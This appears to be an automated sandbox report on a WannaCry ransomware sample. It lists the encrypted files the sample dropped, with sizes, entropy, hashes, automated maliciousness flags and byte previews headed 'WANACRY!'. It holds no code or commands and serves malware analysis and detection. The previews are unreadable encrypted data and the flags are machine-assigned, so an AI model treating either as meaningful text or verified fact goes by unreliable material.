                                                                                      Preview:WANACRY!...........R.n.1...M...l...Wi.....q..x...&.(B.$ .....`D.{N.B...u[...`.I.+........!Y....O.r....i.sU."91.*$...OZ9.]I.....B.w.".+...;.8.DN..W_T...e.....p6.E;"$...a.@./...[A.(F...Y8~M'.(.7..I.W~.....<.$.V...jq.......5....[$N...;...4..)..?....F.o..............f..X.$.Fz|?..=.{N.XL..)Z.2C...*,v..}L..5._.|...N.p.....L.hBG?l.....O.-.~W7...E.]...po}.D...B....`..iU.......0......[G...j.b@.2-.).H....kH..Z.....x..h.P..|>.Ag3?...'i..O....Q.q.....@.x.!.!..5...k..:].... 2.-RnH...8~V;.1.....C...l#......._.ERv..UTz..!.......k"3n.'...a..U2.h...S......F...4.{<Dea....#I....!.s.....2@*......2....V1].E....!...........8z.#..v..k....y..|d$S......ze.N.W.....5...y...sA.*G...0.1....T.-..6.%.....:v+j...YM.....!.a..x...1....H..x..R..&.......j...,.4.e..TV.r=.bD.`....n.<.9.. !.B.I...-{.*....L6A..<.t.wzyYwmN(X..A:W.k.Dj{H...~tsa...C...~..I..{..._..Aa./..S...W.g....m...t.....c8...a0C....Pb..P...pYb.p.......;..;.<25rD>i...R..@S.p..t.ZI@.f...Q..v.u.].....(.N_A.n..{
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.199462773818843
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEsxHa04ZXha97xdzUyvuiyIH06UA/hH0VlEGlhVx6745PI0yCOlw6kdoMhbAlh:bkEsx69ZIVFvtyIiA/wEQrxH5A0yCZ6X
                                                                                      MD5:87CE746F88551527E1D1060A37AD99C1
                                                                                      SHA1:7CB1FD5290734569528086A7CF9FD3184D1AF99D
                                                                                      SHA-256:D8AF889965703920743CF9B42CFF519B01DB370F3C66D987B0760019013102E5
                                                                                      SHA-512:BE917D8D95B14830FC5D697EE8093652245E40D888894FBBDC134BF1F4FBC7A35763F6AC84E232081482882C64776A7E8CF43C10B5D072E5C7EC6FE755073952
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....@.5T......"..\o. ;TB5rO.aA.[dHX1..){......y.D..XH.BJ..T[+56Kb....7H.."..q..s...>...V....s0E*.9.e.......*.3r./.!Vd...nt..q.G@".I.Y...D83...n;....b...<...8...._M.v"..I.f........]\x7.BG8..e..-r....^.@4:$.....@a<F..\!Q3.K....8L.:v.T...F.u......A~..............;.........n.1.2_...8J..H..C.e:
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.199462773818843
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEsxHa04ZXha97xdzUyvuiyIH06UA/hH0VlEGlhVx6745PI0yCOlw6kdoMhbAlh:bkEsx69ZIVFvtyIiA/wEQrxH5A0yCZ6X
                                                                                      MD5:87CE746F88551527E1D1060A37AD99C1
                                                                                      SHA1:7CB1FD5290734569528086A7CF9FD3184D1AF99D
                                                                                      SHA-256:D8AF889965703920743CF9B42CFF519B01DB370F3C66D987B0760019013102E5
                                                                                      SHA-512:BE917D8D95B14830FC5D697EE8093652245E40D888894FBBDC134BF1F4FBC7A35763F6AC84E232081482882C64776A7E8CF43C10B5D072E5C7EC6FE755073952
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....@.5T......"..\o. ;TB5rO.aA.[dHX1..){......y.D..XH.BJ..T[+56Kb....7H.."..q..s...>...V....s0E*.9.e.......*.3r./.!Vd...nt..q.G@".I.Y...D83...n;....b...<...8...._M.v"..I.f........]\x7.BG8..e..-r....^.@4:$.....@a<F..\!Q3.K....8L.:v.T...F.u......A~..............;.........n.1.2_...8J..H..C.e:
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048856
                                                                                      Entropy (8bit):7.99982493576775
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:lARUmYaqZqJwoXEJY3cE2JNUcbiBT02Sv2ZqsmHrmDBEQNRxxzX:lA6mY/K5ce2JNUcGBQ2S+SHrKuQNzxzX
                                                                                      MD5:454E824C03A64FE95659E09EEFEBA79B
                                                                                      SHA1:53C8EC8589A65617DA7A5BC94C49359E007CF249
                                                                                      SHA-256:8D2F8AE122C03435B856EBBEA8AEC693EC364824F7CC0DC08B3B9FD3974509BC
                                                                                      SHA-512:585C56A140D08F95D3EB71E82114B074796D33AE18CE903D9D3CC5043671E05DBB519B00CD980D88F2B216C819A95E41F1FC7C2F224FFA8C3CCB1E082CC5C307
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....^Y.lY.u..t..|.e6r.HWz._..s...I......d@.*....x.g^..B..%C.M....")..s...4..n.$.Ov....t.w..|.=-..|.dh"...i.....v.zz8r.O....(...}9NgK...?.....2.\x..Wd Q.@.h..l...g..^:...X....X.3f...cC.!..7..n..V.W.R..%...Mo......cx..}.b.c...m..JW^.Y.M).l.4...$m.V.............R.....t....!..4un.oB.....1E..(".O...M.[M.l.$....[y.~Fku9y....X..>U..pC..n.?.y..........D..gn..|.;2.F.&qb.........;.d9..M........?..p#@.C/....9..q9.~Up.....iK...f.V..?.%>#F1..W.......E.r.........5.a5.=s.~..._..i....J....=.}....!..wns..Jh......X-..R.Hfw..V}.....Y52#R.M_.[G..%...w=..n... n@Q.@.."....T.$.f.V...7..m#......../Y.$.....+@/...|.2T....&..G......j.z].9.D....f.A5....*|...$.....g... .....2.4....`..i2...v...fc.w..T..........<...G..)..).....Y..J._.IHP..E..y^..3..u...nh... f.,...z....i.......9..g_.G.4,.E...i.Z.~....1..I.r.M...w...L...`..V..xDk.O.@. ...X..[.l=..!...[....b*.*.%B.#z.H.....P<.Y...)369......3...cJW.....'6[..).._..g.{.\.O.......'b=.w.O.H.....t....r+......"..&.gL...p..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048856
                                                                                      Entropy (8bit):7.99982493576775
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:lARUmYaqZqJwoXEJY3cE2JNUcbiBT02Sv2ZqsmHrmDBEQNRxxzX:lA6mY/K5ce2JNUcGBQ2S+SHrKuQNzxzX
                                                                                      MD5:454E824C03A64FE95659E09EEFEBA79B
                                                                                      SHA1:53C8EC8589A65617DA7A5BC94C49359E007CF249
                                                                                      SHA-256:8D2F8AE122C03435B856EBBEA8AEC693EC364824F7CC0DC08B3B9FD3974509BC
                                                                                      SHA-512:585C56A140D08F95D3EB71E82114B074796D33AE18CE903D9D3CC5043671E05DBB519B00CD980D88F2B216C819A95E41F1FC7C2F224FFA8C3CCB1E082CC5C307
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....^Y.lY.u..t..|.e6r.HWz._..s...I......d@.*....x.g^..B..%C.M....")..s...4..n.$.Ov....t.w..|.=-..|.dh"...i.....v.zz8r.O....(...}9NgK...?.....2.\x..Wd Q.@.h..l...g..^:...X....X.3f...cC.!..7..n..V.W.R..%...Mo......cx..}.b.c...m..JW^.Y.M).l.4...$m.V.............R.....t....!..4un.oB.....1E..(".O...M.[M.l.$....[y.~Fku9y....X..>U..pC..n.?.y..........D..gn..|.;2.F.&qb.........;.d9..M........?..p#@.C/....9..q9.~Up.....iK...f.V..?.%>#F1..W.......E.r.........5.a5.=s.~..._..i....J....=.}....!..wns..Jh......X-..R.Hfw..V}.....Y52#R.M_.[G..%...w=..n... n@Q.@.."....T.$.f.V...7..m#......../Y.$.....+@/...|.2T....&..G......j.z].9.D....f.A5....*|...$.....g... .....2.4....`..i2...v...fc.w..T..........<...G..)..).....Y..J._.IHP..E..y^..3..u...nh... f.,...z....i.......9..g_.G.4,.E...i.Z.~....1..I.r.M...w...L...`..V..xDk.O.@. ...X..[.l=..!...[....b*.*.%B.#z.H.....P<.Y...)369......3...cJW.....'6[..).._..g.{.\.O.......'b=.w.O.H.....t....r+......"..&.gL...p..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048856
                                                                                      Entropy (8bit):7.999832538647599
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:afA19I7kZwNIVFlVVVhz9KQE6nV3ChNFLWVZjCnQoJM82dS:1ZwNAfVv06nVqFLYuQoJD
                                                                                      MD5:E41A7D578BE896964E8525FD5513AE82
                                                                                      SHA1:2A58C3EFD30B834EB7675C93835030F625706B8A
                                                                                      SHA-256:C665B796BF7065D17418855818352409313B11DC8610B23A3A95C2C5FA8271A8
                                                                                      SHA-512:F8E791F014EC61F2FFC1DE8DD60C58DF80646805E79C97294FDDA72CC99A51C2E1288294FDBE96178DEB151E8BA56F8CC2BBBC49623B35151C38DBDA82CA3FEA
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....v...%.&Z.....4].w~.+.L..w...{X\..".O...Q.!K..3+..R.$.f.L.S..J...e...u.yx-G...X.J7.J...D.......M..pl./.&..\.Q.Dd8Nde.m..'...;............7X....8./'..q_.F../.......^}....(..}...EK..v1...Y.u.>.7+...r...6...n......q..~....1....kz.?.T..[..^..n...R..............Jn.>....`.ix.HU.S.VG..9.........e4`5x.&.|#..+cJ'.f.V..6.c....)7..(2aV.:H..WU....[@.u_B..,....H.<..ul..B...]......'...3..my.:..y...........&..O...L.......7..E[a.}...{.......4e..;?L..T.f...J/....20.+..0..&.Cr.z%..I..m..ia.l...*...6.}....dW...o....S.-.s.3..^......J.......d....WV....,..h|g~I....M....@.l....bG...{...._....-d^..x.,...8...I./......q)8j.,cm...J...'{.s.jg.....uY.>.*s...ki.`x.......<...k....7.-_e}..@..o..L..9z......Y>G9E.;T.a0.O.....4............RYJ=m.T+......yX..n7S..C...k.3.Q.re.......P.9.o.0!.;"....2........%..Q.@.r.......4.^.3......U....J;=.e..R.$.BY.;..J......^..'..w!.....^...J'...#......Nh"qV.v.O....qY.6BN.9+.at.,..A..d...i.L..7\..%..;#.eg....s..._
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048856
                                                                                      Entropy (8bit):7.999832538647599
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:afA19I7kZwNIVFlVVVhz9KQE6nV3ChNFLWVZjCnQoJM82dS:1ZwNAfVv06nVqFLYuQoJD
                                                                                      MD5:E41A7D578BE896964E8525FD5513AE82
                                                                                      SHA1:2A58C3EFD30B834EB7675C93835030F625706B8A
                                                                                      SHA-256:C665B796BF7065D17418855818352409313B11DC8610B23A3A95C2C5FA8271A8
                                                                                      SHA-512:F8E791F014EC61F2FFC1DE8DD60C58DF80646805E79C97294FDDA72CC99A51C2E1288294FDBE96178DEB151E8BA56F8CC2BBBC49623B35151C38DBDA82CA3FEA
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....v...%.&Z.....4].w~.+.L..w...{X\..".O...Q.!K..3+..R.$.f.L.S..J...e...u.yx-G...X.J7.J...D.......M..pl./.&..\.Q.Dd8Nde.m..'...;............7X....8./'..q_.F../.......^}....(..}...EK..v1...Y.u.>.7+...r...6...n......q..~....1....kz.?.T..[..^..n...R..............Jn.>....`.ix.HU.S.VG..9.........e4`5x.&.|#..+cJ'.f.V..6.c....)7..(2aV.:H..WU....[@.u_B..,....H.<..ul..B...]......'...3..my.:..y...........&..O...L.......7..E[a.}...{.......4e..;?L..T.f...J/....20.+..0..&.Cr.z%..I..m..ia.l...*...6.}....dW...o....S.-.s.3..^......J.......d....WV....,..h|g~I....M....@.l....bG...{...._....-d^..x.,...8...I./......q)8j.,cm...J...'{.s.jg.....uY.>.*s...ki.`x.......<...k....7.-_e}..@..o..L..9z......Y>G9E.;T.a0.O.....4............RYJ=m.T+......yX..n7S..C...k.3.Q.re.......P.9.o.0!.;"....2........%..Q.@.r.......4.^.3......U....J;=.e..R.$.BY.;..J......^..'..w!.....^...J'...#......Nh"qV.v.O....qY.6BN.9+.at.,..A..d...i.L..7\..%..;#.eg....s..._
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.288459632498963
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEIaZBFm8y4BY9nZQnmeua4kfRQ5R9Eb5tIDaHtLom7hzmLCa8msU9Nqo:bkEvZBFm8y4B2mnH4k55CqS40LC5+Tqo
                                                                                      MD5:F5E1E46816007024EFD27C486E3B1002
                                                                                      SHA1:42E08D19750E7EE549E83C04BAAFE3660532F03F
                                                                                      SHA-256:A190B8D75CE79F818A6B180A4B948CA59081764F2440BBD4A7F00168E5194315
                                                                                      SHA-512:04F7E2C53B3FCEA70E6BB5BC6DB350C2F0F8FB2E8C7335505289BC0B4DC0BD54228D3E7E1B99D018A14282323B3799BB4DA88015768C3A09C0E676703621A5C5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........j....<|.~F....:.......p.....`s..VNL+.,oy.0.h...m...F..p..!.{.._b.0.U.H7.a.1i..!+<...*U6M..[...}v.S{.F=Y......T..S. ....|...t%.>..N"..............>?SZ..u.X............. .......F....,....-............g.4..z,.]%.f.e....d.1.XJ...hO.,41w{.n................... D.._..C.Z....c$.......F
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.288459632498963
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEIaZBFm8y4BY9nZQnmeua4kfRQ5R9Eb5tIDaHtLom7hzmLCa8msU9Nqo:bkEvZBFm8y4B2mnH4k55CqS40LC5+Tqo
                                                                                      MD5:F5E1E46816007024EFD27C486E3B1002
                                                                                      SHA1:42E08D19750E7EE549E83C04BAAFE3660532F03F
                                                                                      SHA-256:A190B8D75CE79F818A6B180A4B948CA59081764F2440BBD4A7F00168E5194315
                                                                                      SHA-512:04F7E2C53B3FCEA70E6BB5BC6DB350C2F0F8FB2E8C7335505289BC0B4DC0BD54228D3E7E1B99D018A14282323B3799BB4DA88015768C3A09C0E676703621A5C5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........j....<|.~F....:.......p.....`s..VNL+.,oy.0.h...m...F..p..!.{.._b.0.U.H7.a.1i..!+<...*U6M..[...}v.S{.F=Y......T..S. ....|...t%.>..N"..............>?SZ..u.X............. .......F....,....-............g.4..z,.]%.f.e....d.1.XJ...hO.,41w{.n................... D.._..C.Z....c$.......F
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5243160
                                                                                      Entropy (8bit):7.9999659578875475
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:rwFiKmf0MuIP0Db4DtGfSIcBret4v/thX01ti6paUF5x5iqMTiGMBJH1+reu:Amf4IP0HWGfSBrqIVOrHF5x/MdMBJHOV
                                                                                      MD5:1CC6D5ECD14E8B97BFB7EF30E125E5CF
                                                                                      SHA1:235670101B80778113E7B0F8EADB470A0785D3C7
                                                                                      SHA-256:7B049FCBC2AC19E5F4E3A6FCAE54D2072833809A8C934938486B04ED3C0769F1
                                                                                      SHA-512:19633AA7BC39ED8C6AF15770893DAAC305D5C9B810BAAB9CBE3BA5EF5353823689B7C2F2882502965522AB3E923F4299628C64D6AD1ABFA3C297447E095978AE
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....+.{..-..u..UC....NS........d...q..-&ofR)..l...."...G....qNnr...A......K..A.yC.......Eb.'f9.4..;......0...Ma..o...&....."pIoN.S...`o.3>{6J8z~G................|...3s.z.Q..p.4.^3.0H...<...%(...S."..u..I...v.S....%....t.]...pY.Eh...{......-....x........P......x.l.;f....T........k...../)....{;.].j....}.>..qk.bM6ser..\....v......QL.#.0..FT.^_{^..n.....NS....C...R..].b!....(....6R.?X*7...U..l.L2..T\.m..n#...........g?u..o..&..6...........+...&%ChgoxY........@]..-.Rb.u.%............d.+7..............)......i.t .r.?.[.j.Z.......=..obG.Z..pdw...@.....=A.r4.......=?..aO"..@<..* |.......#..8.......i.t,q...*K.M.CZ.....h....1./}........E..C.....3....wb.....x.@b1.u....@.....i..........:.bJ.YV....@...V~.C!7..J...!_*o>.gAEO...M.)g.j.....1o.$..6r.%.*....r...@.|..y.L.!.q.....J.Q.@....7.6...$@Jf.,2..:Z|z..u5.......N.,...O.N.{.V..ZU.Ya........L..vw....Ws......|..j~r.}.0v.m.{...3..\.{..^.}..._...........r.a...z.;([.....1[....Hg/T..5....7 h
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5243160
                                                                                      Entropy (8bit):7.9999659578875475
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:rwFiKmf0MuIP0Db4DtGfSIcBret4v/thX01ti6paUF5x5iqMTiGMBJH1+reu:Amf4IP0HWGfSBrqIVOrHF5x/MdMBJHOV
                                                                                      MD5:1CC6D5ECD14E8B97BFB7EF30E125E5CF
                                                                                      SHA1:235670101B80778113E7B0F8EADB470A0785D3C7
                                                                                      SHA-256:7B049FCBC2AC19E5F4E3A6FCAE54D2072833809A8C934938486B04ED3C0769F1
                                                                                      SHA-512:19633AA7BC39ED8C6AF15770893DAAC305D5C9B810BAAB9CBE3BA5EF5353823689B7C2F2882502965522AB3E923F4299628C64D6AD1ABFA3C297447E095978AE
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....+.{..-..u..UC....NS........d...q..-&ofR)..l...."...G....qNnr...A......K..A.yC.......Eb.'f9.4..;......0...Ma..o...&....."pIoN.S...`o.3>{6J8z~G................|...3s.z.Q..p.4.^3.0H...<...%(...S."..u..I...v.S....%....t.]...pY.Eh...{......-....x........P......x.l.;f....T........k...../)....{;.].j....}.>..qk.bM6ser..\....v......QL.#.0..FT.^_{^..n.....NS....C...R..].b!....(....6R.?X*7...U..l.L2..T\.m..n#...........g?u..o..&..6...........+...&%ChgoxY........@]..-.Rb.u.%............d.+7..............)......i.t .r.?.[.j.Z.......=..obG.Z..pdw...@.....=A.r4.......=?..aO"..@<..* |.......#..8.......i.t,q...*K.M.CZ.....h....1./}........E..C.....3....wb.....x.@b1.u....@.....i..........:.bJ.YV....@...V~.C!7..J...!_*o>.gAEO...M.)g.j.....1o.$..6r.%.*....r...@.|..y.L.!.q.....J.Q.@....7.6...$@Jf.,2..:Z|z..u5.......N.,...O.N.{.V..ZU.Ya........L..vw....Ws......|..j~r.}.0v.m.{...3..\.{..^.}..._...........r.a...z.;([.....1[....Hg/T..5....7 h
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.126826749348742
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkE2eO6HOC6DN6P46PuowuqBCtMUbcn0+HlT1KJBN:bkE2eHOC6DN6P46WNuhNbcn0gTI9
                                                                                      MD5:61B2872DD856D17CD4859DCF480F4B27
                                                                                      SHA1:3CD66481D547AB2D3BC1A13CD87B8AA0C8B4F91F
                                                                                      SHA-256:0F9999A2ACFFA3B3F6DDE9ACB28DA47AF88FDFD2E68FCA08E05C4D4D13AABC8B
                                                                                      SHA-512:CF732DC5C77B1E7AF94E660C230A1F4B98C1F4970963C0998F1A6063D3D489947D78D2CFB30FD613255103694EDF459E38E4E81288F0D1588384547BAA980D4C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....V.{p..F#...q...;.......-...p|2....e..0<.=2..N..m..=...h.7A.j...7..qs.....Z.Ml...^.u.v.K%.../1FO....;i.2.V...,...h..t.me.=#._.w...G.E......^...u...j..[......W........2.p.G&~.)....;.4..4.K{O..}..@....\c...[....}..(."4I..r.%x.q..*kG.. .y...o.t..s5.L.Y............"1.X....B...QO.....[..mT.>.A.M
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.126826749348742
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkE2eO6HOC6DN6P46PuowuqBCtMUbcn0+HlT1KJBN:bkE2eHOC6DN6P46WNuhNbcn0gTI9
                                                                                      MD5:61B2872DD856D17CD4859DCF480F4B27
                                                                                      SHA1:3CD66481D547AB2D3BC1A13CD87B8AA0C8B4F91F
                                                                                      SHA-256:0F9999A2ACFFA3B3F6DDE9ACB28DA47AF88FDFD2E68FCA08E05C4D4D13AABC8B
                                                                                      SHA-512:CF732DC5C77B1E7AF94E660C230A1F4B98C1F4970963C0998F1A6063D3D489947D78D2CFB30FD613255103694EDF459E38E4E81288F0D1588384547BAA980D4C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....V.{p..F#...q...;.......-...p|2....e..0<.=2..N..m..=...h.7A.j...7..qs.....Z.Ml...^.u.v.K%.../1FO....;i.2.V...,...h..t.me.=#._.w...G.E......^...u...j..[......W........2.p.G&~.)....;.4..4.K{O..}..@....\c...[....}..(."4I..r.%x.q..*kG.. .y...o.t..s5.L.Y............"1.X....B...QO.....[..mT.>.A.M
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.243931693629506
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkE48y3izN45G8rsNs4uvCCLNlrp2OHgdK88/fWWUA9t9kP+e:bkExMQNU8s4uv7L73gdK1huP+e
                                                                                      MD5:6451BDD4AF55E8D17898E4ABEC6516AE
                                                                                      SHA1:53C8079DAB226AC2263C3C7F66AEDD8DD2627BA2
                                                                                      SHA-256:431CE8B1ABF8973105359FCC063184FE60169082FAFBAC8F5DCAEACA70D8E638
                                                                                      SHA-512:F6725221E0888986EDEAA00482BFB491AA2A628E37D119638F3B8E2F1C54ECD31664595A13FCDCA5A87561B35FC74A5F5010FAD72C047B08AD678009E1B39104
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......JH#9Y..>.....x.!r]......:F.....lf"...;..j..... ._..}6>s^..9.A..C...ju.=Q.;......<.k.....].Hv&GX.....C........7].Ww@UY..SIb.....!...>..P..(k..MA5.l3)n.L"...5!ds.F.X..l.H..N.2J..../.{...w.TO...(.,.Ie..I.:....3.7Q.z&..ui..?.5.+....7..h.Z....HC..............v..f...T.YD..e.(.S.....6...\..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.243931693629506
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkE48y3izN45G8rsNs4uvCCLNlrp2OHgdK88/fWWUA9t9kP+e:bkExMQNU8s4uv7L73gdK1huP+e
                                                                                      MD5:6451BDD4AF55E8D17898E4ABEC6516AE
                                                                                      SHA1:53C8079DAB226AC2263C3C7F66AEDD8DD2627BA2
                                                                                      SHA-256:431CE8B1ABF8973105359FCC063184FE60169082FAFBAC8F5DCAEACA70D8E638
                                                                                      SHA-512:F6725221E0888986EDEAA00482BFB491AA2A628E37D119638F3B8E2F1C54ECD31664595A13FCDCA5A87561B35FC74A5F5010FAD72C047B08AD678009E1B39104
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......JH#9Y..>.....x.!r]......:F.....lf"...;..j..... ._..}6>s^..9.A..C...ju.=Q.;......<.k.....].Hv&GX.....C........7].Ww@UY..SIb.....!...>..P..(k..MA5.l3)n.L"...5!ds.F.X..l.H..N.2J..../.{...w.TO...(.,.Ie..I.:....3.7Q.z&..ui..?.5.+....7..h.Z....HC..............v..f...T.YD..e.(.S.....6...\..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):29512
                                                                                      Entropy (8bit):7.993900750912928
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:kMfkJ7xLmKozHPQOSs6ZcIBQ5oaf8U2bVwpk:RkXLizHPesf8d/
                                                                                      MD5:EB82535EF3D53983D450DFCDF8D96570
                                                                                      SHA1:5F3CBECD376477C2ADE5E0EF34CFCD2605920F69
                                                                                      SHA-256:9EEB783FBDA4FCEB8A301262F1937C19B2919F2887EBD03FF1B4800CABFC521F
                                                                                      SHA-512:AC2C0408B8C35C623339493F50D570963E227D4FFE135955216E5341BF81C5F8C676E9861B503A992B630F8648D2693874B91E843FB3EC204F88076D7A49D4D3
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....}.p.....R9.8...{#g.E....B.)O..,.J............+=3d2...R..f..3..Z.O..9=.G.VEl.....1C.....^$..sjB.........K....]........$jgjpO..Y..z..D~[......=P..H.-..H..`.y^.>_3I..m.{..a.%.2.c.(..R.Zt.7.F.....N.v.v.)i`.&[:..T;..F.<..7....9.l..=;W.a.eQ9>W*..s..;.t.i....0r......@...W.?.SP.Z..>............V.#......5...XH..A..&tX.0......&.pK...2Zd/...[..A.._.o....9....4.....?2....`...3.L?..X..ee9.wx%...!.<...;J.0.F.%..\+u.S...t..\-.....!...........E...=d.)b...Z..;a.3v.....$U.'3.....LW_'.&..'UB....#.q]+6..C.?....!..R."..t.._E'j.S.D..n&?.8.n.(.k..e....^.....G.s\.Z..*8..F...D2...O4=.0...y...J..=....AI.-.y....y..L..^r.W..F...UZ.e]n"....p.l...G8P..*(..g^.H....V..o9A...s.yYnn.*.57....m...r.1......(b&_.$.#...O..p)...ij......j3^V.....F#...k(.3OW.2>..te^...Gk.*.;.]X. /....C.D.u.....W3t$..lJe.Ih...].i...lZ*...p...>....d....u.....Ow~....D...}e'Q{e'.....W......6V....;..57.cB...O'..F.........6.......J... Zc..Z.....=.K..j.......l.x......mR....-Y.,...Q.I|...'...M.......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):29512
                                                                                      Entropy (8bit):7.993900750912928
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:kMfkJ7xLmKozHPQOSs6ZcIBQ5oaf8U2bVwpk:RkXLizHPesf8d/
                                                                                      MD5:EB82535EF3D53983D450DFCDF8D96570
                                                                                      SHA1:5F3CBECD376477C2ADE5E0EF34CFCD2605920F69
                                                                                      SHA-256:9EEB783FBDA4FCEB8A301262F1937C19B2919F2887EBD03FF1B4800CABFC521F
                                                                                      SHA-512:AC2C0408B8C35C623339493F50D570963E227D4FFE135955216E5341BF81C5F8C676E9861B503A992B630F8648D2693874B91E843FB3EC204F88076D7A49D4D3
                                                                                      Malicious:true
                                                                                      Reputation:low
